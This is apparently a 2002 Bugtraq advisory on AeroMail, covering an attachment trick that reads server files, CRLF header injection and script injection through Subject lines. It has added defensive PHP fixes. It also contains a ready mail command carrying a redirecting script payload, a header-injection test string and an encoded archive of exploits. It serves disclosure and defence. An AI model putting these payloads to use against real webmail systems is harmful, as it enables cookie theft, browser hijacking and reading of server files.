AeroMail multiple vulnerabilities

From: Ulf Harnhammar (ulfhat_private)
Date: Sun Mar 03 2002 - 12:26:05 PST


    AeroMail multiple vulnerabilities
    
    PROGRAM: AeroMail
    VENDOR: Mark Cushman (markat_private)
    HOMEPAGE: http://the.cushman.net/projects/aeromail/
    MIRROR: http://www.packetplay.com/projects/aeromail/
    VULNERABLE VERSIONS: all versions below 1.45
    SEVERITY: medium to high
    
    
    DESCRIPTION:
    
    "AeroMail is a Web-based email client written in PHP. It uses an IMAP server
    to read and store messages in one or more user-defined folders, and its
    features include HTTP authentication for login (no cookies), folder
    manipulation, support for sending and viewing attachments, inline image
    display, multilanguage support, and URL highlighting."
    (direct quote from the program's project page on Freshmeat)
    
    AeroMail is released under the terms of the GNU General Public License.
    It seems to have quite a few users.
    
    
    ISSUES:
    
    1) When sending e-mail, you can trick the attachment subsystem into attaching
    local files from the web server, or remote files fetched from URLs, instead of
    the uploaded file it should be sending.
    
    How is that possible? After PHP has received an uploaded file, it sets a few
    variables with information about it (with register_globals on, PHP's default
    at the time, these appear as ordinary global variables). One of them holds the
    name under which the uploaded file has been temporarily stored. A script must
    check that this variable was really set by a file upload, for instance with
    is_uploaded_file(). If it does not, the same variable can just as well have
    been filled from an ordinary POSTed form field, and then whatever path or URL
    the sender supplied is read and attached as if it were the upload.
    
    2) You can add extra headers to outgoing e-mail messages by sending normal data
    for the To, Cc or Subject field, followed by a CRLF and then another header
    with its own data. (Many other programs allow this too; it is not just
    AeroMail.) This can also be used to put uuencoded attachments up in the
    headers, with lines ending in CR instead of CRLF, as previously discussed here
    on Bugtraq.
    
    3) JavaScript and HTML code in Subject headers is rendered active when the
    subjects are displayed. This allows denial-of-service attacks by redirecting
    the browser, theft of cookies, and so on.
    
    Issues 1 and 2 require a valid user/password combination to be exploited,
    while issue 3 is open to anyone.
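
    The three checks that close these holes, as an added example in PHP. This is
    not AeroMail's code and not the vendor's patch; the form field names
    ('attachment', 'to', 'cc', 'subject') and the function names are assumptions
    made for illustration, and the sample inputs at the bottom are constructed.
    It needs PHP 4.3 or later for $_FILES and UPLOAD_ERR_OK.

```php
<?php
// Added example, not AeroMail's own code: the checks a PHP webmail client
// needs at the three points the advisory describes. Field names and
// function names are assumptions for illustration.

// Issue 1: trust only a temporary filename that PHP itself created for a
// file uploaded in this request. With register_globals on (PHP's default in
// early 2002) a POSTed field called "attachment" would otherwise land in
// $attachment and be opened as a local path or a URL.
function uploaded_attachment($field)
{
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $tmp = $_FILES[$field]['tmp_name'];
    // is_uploaded_file() is the check the advisory asks for: true only for a
    // file PHP received via HTTP POST, never for a value the client typed in.
    if (!is_uploaded_file($tmp)) {
        return false;
    }
    // basename() keeps a client-chosen name from carrying directory parts.
    return array('path' => $tmp, 'name' => basename($_FILES[$field]['name']));
}

// Issue 2: a CR or LF inside To, Cc or Subject ends that header and lets the
// sender append further headers (or, with CR-terminated lines, a uuencoded
// block inside the header section). Reject the value instead of "fixing" it.
function header_value($value)
{
    return preg_match('/[\r\n]/', $value) ? false : trim($value);
}

// Assemble the pieces of an outgoing message from a POST array, refusing
// anything that fails the checks above. Returns false on bad input so the
// caller shows an error instead of handing the data to mail().
function build_outgoing($post, $attachment_field = 'attachment')
{
    $to      = header_value(isset($post['to']) ? $post['to'] : '');
    $cc      = header_value(isset($post['cc']) ? $post['cc'] : '');
    $subject = header_value(isset($post['subject']) ? $post['subject'] : '');
    if ($to === false || $cc === false || $subject === false || $to === '') {
        return false;
    }
    $headers = ($cc !== '') ? "Cc: $cc\r\n" : '';
    return array(
        'to'         => $to,
        'subject'    => $subject,
        'headers'    => $headers,               // extra headers for mail()
        'attachment' => uploaded_attachment($attachment_field),
    );
}

// Issue 3: the Subject of an incoming mail comes from an arbitrary sender on
// the Internet; escape it before it is written into the folder listing.
// ENT_QUOTES also covers a subject that lands inside an attribute value.
function display_subject($subject)
{
    return htmlspecialchars($subject, ENT_QUOTES);
}

// Constructed inputs for a dry run from the command line: php this_file.php
if (PHP_SAPI === 'cli') {
    // Header injection attempt: a Bcc smuggled in through the To field.
    $injected = array(
        'to'      => "bob@example.org\r\nBcc: everyone@example.org",
        'subject' => 'hello',
    );
    var_dump(build_outgoing($injected));

    // A clean request, with no file uploaded, goes through.
    var_dump(build_outgoing(array('to' => 'bob@example.org', 'subject' => 'hello')));

    // The Subject from the advisory's issue 3, escaped for display.
    $xss = '<script>self.location.href="http://www.kuro5hin.org/"</script>';
    echo display_subject($xss), "\n";
}
```

    The result of build_outgoing() maps directly onto mail($to, $subject, $body,
    $headers); the attachment entry is either false or the checked temporary
    path plus a cleaned display name, so the code that reads the file never
    sees a client-supplied path.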
    
    The vendor was contacted with an explanation, two exploits and a patch on the
    23rd of February. Version 1.45, which is not vulnerable to any of these
    issues, was released on the 27th of February.
    
    
    RECOMMENDATION:
    
    I recommend that all users upgrade to version 1.45 immediately.
    
    
    EXPLOITS:
    
    Here are HTML exploits for issues 1 and 2. They are distributed as a
    uuencoded, gzipped tar archive.
    
    Issue 3 doesn't need a special exploit - you just send an ordinary mail:
    
    mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' \
    metaurat_private < /dev/null
    
    
    // Ulf Harnhammar
    metaurat_private
    
    
    begin 644 aeromail_exploits.tar.gz
    M'XL("!9R@CP``V%E<F]M86EL7V5X<&QO:71S+G1A<@#M5FUOVS80]F?]BJL&
    M;"TPF[(MQYEG!VT<`PF0-Z0.VGT*:(FVV$FB1E)QLU^_HR0G?EOL8AG:;GP`
    M03B2]\KCW5$F14)Y?,<^9['@6I':B\/S?*_;Z>#?\[H'_LJ_0LWK^K[G=YM>
    MLU7#K^MW:]!Y>5,VD2M-)4`MCZ?/G]NQ_YV";MS_^DJS$>DD_B<ZO*;G'?C^
    MW]U_J]-NK]U_%]=JX+V4D\_A?W[__5<G5\/Q;]<C.!U?G,/U[?'YV1#<.B$?
    MVD-"3L8GY8;?\)HPEC157'.1TIB0T:7KN)'668^0^7S>F+<;0L[(^(:8A/%)
    M+(1BC5"'[I'3-TOFQVB(/\UUS([>8:9=8*;!J,PT:/9)N>/T$Z8I&.%U]D?.
    M[P?N4*2:I;H^?LB8"T%)#5S-/NM"WZ\01%0JI@=<B?KA8>>7>M,H)J5*IS\1
    MX0-,9H&(A1RX/TP+N&`$(%FFH@LQ3W]?(NDJ[=ROTL:CYE8_<!EU3H5,`%V)
    M1#APKZ_>CU%B8.(W6`[</<>UI!&(Y/'Q$<72\"YA2M$9:V11AJH^2*[1:9@\
    M0!]C(]ETX)JS6O1,M'+Y-I,8EH+?"'./;N,IG/Y(<XR.3".:)%3V"3UR>`HM
    M?'>-?F:,Y&F6:]`85[2*AR%+74AIat_private=(W=,X1_+L\OCJHPN*_XF$<=X9
    MBUY_(H]699B(+B1HL3C?08;BK#,,=C`%P2;3.ZUI$,'K>40U3'G,0$BXO3D'
    M+<#$ZLT.F;3@7Y*[<(HP'9",*C4/5W7=F:/PFIN`:Z9^AD]8*@"3CDE0PEPJ
    M3V>@C3U<P83/<$_DLV@_2PKI6\QI>?[AFAV&K7)<1VS%^3F/8Y@P"&@<LQ#0
    M5G/BXNQBY)BT9U+M:8TAMEBS-2Y&R'Y2=?%6UZ4Z+LVRF`?4/`0B`LUT76G)
    M:+)0]#Z??&*!WJ%$E:<V<^487WK%:\Y3%%VQF!K@@A1SA>=-%8E5R8AU8G&T
    M$K*B%E4E7#^&9?'.<<EPFE=N.(@17Y2<HMA][=*^%W;W_]:_WO^[IN?;_O]5
    M\$WU_]9_I/^WOJ?^?RDTZ\&)2'_2D$G4"*/+\>@&Z-1T.M-/8HJ-K^PGIL70
    M]`'$M-A9U$SU@J/$6LDV$\2V@KW59>=C_;2PL][LP2F3#%!2T:V?=EH]0`V2
    M@F&JW%(;Y?]Q2%DSQ\PFV\S!\A"]S;.0:M;(\X9:4MA>,H7"E,TA$7)IW^\]
    M;\HS45U,-5544Y&RY:#NY*RFD(K=^S+><F:H>+^,M1P,=HX#R_FQ.A.LW<KC
    M*+#M:C:?YU/L.TMWLTCUI]V#O5+%CAL6%A86%A86%A86%A86%A86%A86%A;?
    +'/X"S&R_G``H````
    `
    end
    



    This archive was generated by hypermail 2b30 : Sun Mar 03 2002 - 13:05:10 PST